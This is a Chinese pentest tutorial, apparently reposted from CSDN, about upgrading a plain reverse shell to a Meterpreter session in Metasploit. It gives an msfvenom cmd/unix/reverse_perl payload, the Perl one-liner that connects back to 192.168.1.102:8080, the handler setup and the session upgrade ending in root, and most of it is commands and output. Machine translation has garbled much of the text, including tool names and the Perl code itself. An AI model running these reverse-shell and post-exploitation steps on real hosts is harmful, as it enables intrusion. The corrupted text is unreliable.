渗透测试 渗透测试的基本流程

渗透测试致敬亮神 Micropoor 无Meterpreter Shell添加虚拟路由映射 ​ ​payload生成:以cmd/unix/reverse_perl​​​ ​靶机执行:​​​ ​上线 session

向光芒四射的米克波阿神致敬

无Meterpreter Shell添加虚拟路由映射

有效负载生成:使用cmd/unix/reverse_perl 运行目标机器:在线会话会话心跳显示:假会话

在实战中,调用meterpreter模块并不方便,因为很多反向shell没有meterpreter shell。

payload生成:以cmd/unix/reverse_perl

登录后复制

[

@约翰

/

[暂时的]

#

无国界医生毒药

-p

指令

/

UNIX

/

反向_珍珠

丢失的

=

192.168.1.10

2

左端口

=

8080

[

-]

平台

曾是

选择的,

选择

msf: 模块: 平台:Unix

有效负载

[

-]

选择的,

选择

拱门:

指令

有效负载

编码器

或者

坏角色

指定的,

输出

活的

有效负载

有效负载

尺码:

第232章

兼职工作

珍珠

-澪

-e

\’$p=fork;退出,if($p);foreach 我的$key(keys %ENV){if($ENV {$key}=~/(.*)/){$ENV{$key}=$1 ;}}$c=new IO:Socket:INET(PeerAddr,\’192.16 8.1.102:8080\’);STDIN‐fdopen($c,r);$~‐fdopen($c,w);while(){if($_=~ /(. *)/){系统$1;}};\’

1.2.3.4.5.6.7。

攻击机设置:

小心参数

登录后复制

无国界医生组织

开发(

/

处理程序)

展示

选项

模块

选项(

开发

/

/

处理程序):

姓名

当前的

环境

必需的

解释

‐‐‐‐

——————————————————

————————————

———————————————

有效负载

选项(

指令

/

UNIX

/

反向perl):

姓名

当前的

环境

必需的

解释

‐‐‐‐

——————————————————

————————————

———————————————

丢失的

192.168.1.102

是的

地址(

界面

可能

习惯它

规格

场地)

左端口

8080

是的

港口

开发

目标:

ID

姓名

0

通配符

目标

无国界医生组织

开发(

/

处理程序)

开发

-j

[

*]

开发

跑步

作为

背景

工作

0。

[

*]

已经开始了

倒退

传输控制协议

处理程序

之上

192.168.1.102:

8080

1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21。

靶机执行:

登录后复制

@kali:

#

珍珠

-澪

-e

\’$p=fork;退出,if($p);foreach 我的$key(keys %E NV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO:Socket:INET(PeerAddr,\’192.168.1.102:8080\’);STDIN‐fdopen($c,r);$~‐fdopen($c,w);while(){i f($_=~ /(.*)/){系统$1;}};\’

无参数

“使用IO”

废除

-e

线

0。

1.2.3.

上线 session

登录后复制

开发(

/

处理程序)

开发

-j

[

*]

开发

跑步

作为

背景

工作

8.

[

*]

已经开始了

倒退

传输控制协议

处理程序

之上

192.168.1.102:

8080

无国界医生组织

开发(

/

处理程序)

[

*]

指示

会议

打开(

192.

168.1.102:

8080

192.168.1.117:

36914)

2019年

-02-23

06:

35:

07

-0500

无国界医生组织

开发(

/

处理程序)

会议

-l

积极的

会议

===============

ID

姓名

类型

信息

联系

‐‐‐‐

‐‐‐‐

———————————————

————————————

指令

/

UNIX

192.168.1.102:

8080

192.168.1.117:

36914(

192.168。

1.117)

1.2.3.4.5.6.7.8.9.10。

msf的shell cmd没有心跳,因此无法检测会话是否存活且有效。

查看session 心跳:

登录后复制

exploit(

multi

/

handler)

>

sessions

‐x

Active

sessions

===============

Id

Name

Type

Checkin

?

Enc

?

Local

URI

Information

Connection

‐‐

‐‐‐‐

‐‐‐‐

‐‐‐‐‐‐‐‐

‐‐‐‐

‐‐‐‐‐‐‐‐‐

‐‐‐‐‐‐‐‐‐‐‐

‐‐‐‐‐‐‐‐‐‐

10

shell

cmd

/

unix

?

N

?

192.168.1.102:

8080

>

192.168.1.117:

36914 (

19

2.168.1.117)

1.2.3.4.5.6.7.

假session

在msf4.0以后,体现出了meterpreter下的后渗透,
但大部分需要转换meterpreter shell。
而meterpreter又以心跳为前提,故Information为NULL时,俗称“假session”

转换meterpreter shell 参数 -u,并且出现心跳。

登录后复制

exploit(

multi

/

handler)

>

sessions

‐u

10

[

*]

Executing

\’post/multi/manage/shell_to_meterpreter\’

on

session(

s): [

10]

[

*]

Upgrading

session

ID:

10

[

*]

Starting

exploit

/

multi

/

handler

[

*]

Started

reverse

TCP

handler

on

192.168.1.102:

4433

[

*]

Sending

stage (

914728

bytes)

to

192.168.1.117

[

*]

Meterpreter

session

11

opened (

192.168.1.102:

4433

>

192.168.1.117:

57692)

at

2019

‐02‐23

06:

39:

18

‐0500

[

*]

Command

stager

progress:

100.00

% (

773

/

773

bytes)

msf

exploit(

multi

/

handler)

>

sessions

‐l

Active

sessions

===============

Id

Name

Type

Information

Connection

‐‐

‐‐‐‐

‐‐‐‐

‐‐‐‐‐‐‐‐‐‐‐

‐‐‐‐‐‐‐‐‐‐

10

shell

cmd

/

unix

192.168.1.102:

8080

>

192.168.1.117:

36914 (

192.168.

1.117)

11

meterpreter

x86

/

linux

uid

=

0,

gid

=

0,

euid

=

0,

egid

=

0

@

192.168.1.117

192.168.1.102:

4433

>

192.168.1.117:

57692 (

192.168.1.117)

msf

exploit(

multi

/

handler)

>

sessions

‐x

Active

sessions

===============

Id

Name

Type

Checkin

?

Enc

?

Local

URI

Information

Connection

‐‐

‐‐‐‐

‐‐‐‐

‐‐‐‐‐‐‐‐

‐‐‐‐

‐‐‐‐‐‐‐‐‐

‐‐‐‐‐‐‐‐‐‐‐

‐‐‐‐‐‐‐‐‐‐

10

shell

cmd

/

unix

?

N

?

192.168.1.102:

8080

>

192.168.1.117:

36914 (

19

2.168.1.117)

11

meterpreter

x86

/

linux

39s

ago

Y

?

uid

=

0,

gid

=

0,

euid

=

0,

egid

=

0

@

1

92.168.1.117

192.168.1.102:

4433

>

192.168.1.117:

57692 (

192.168.1.117)

1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.23.24.25.26.27.

登录后复制

meterpreter

>

ps

Process

List

============

PID

PPID

Name

Arch

User

Path

‐‐‐

‐‐‐‐

‐‐‐‐

‐‐‐‐

‐‐‐‐

‐‐‐‐

1

0

systemd

x86_64

root

/

lib

/

systemd

2

0

kthreadd

x86_64

root .

4

2

kworker

/

0:

0H

x86_64

root .

6

2

mm_percpu_wq

x86_64

root .

7

2

ksoftirqd

/

0

x86_64

root .

8

2

rcu_sched

x86_64

root .

1516

2577

923

perl

x86_64

root

/

usr

/

bin

2600

923

iegkM

x86_64

root

/

tmp

meterpreter

>

getuid

erver

username:

uid

=

0,

gid

=

0,

euid

=

0,

egid

=

0

meterpreter

>

getpid

22

Current

pid:

2600

1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.19.20.21.22.

此时可以调用强大的meterpreter后渗透模块,有趣的渗透刚刚开始。
#以上关于渗透测试的相关内容来源网络仅供参考,相关信息请以官方公告为准!

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92589.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月27日 下午5:17
下一篇 2024年6月27日 下午5:17

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注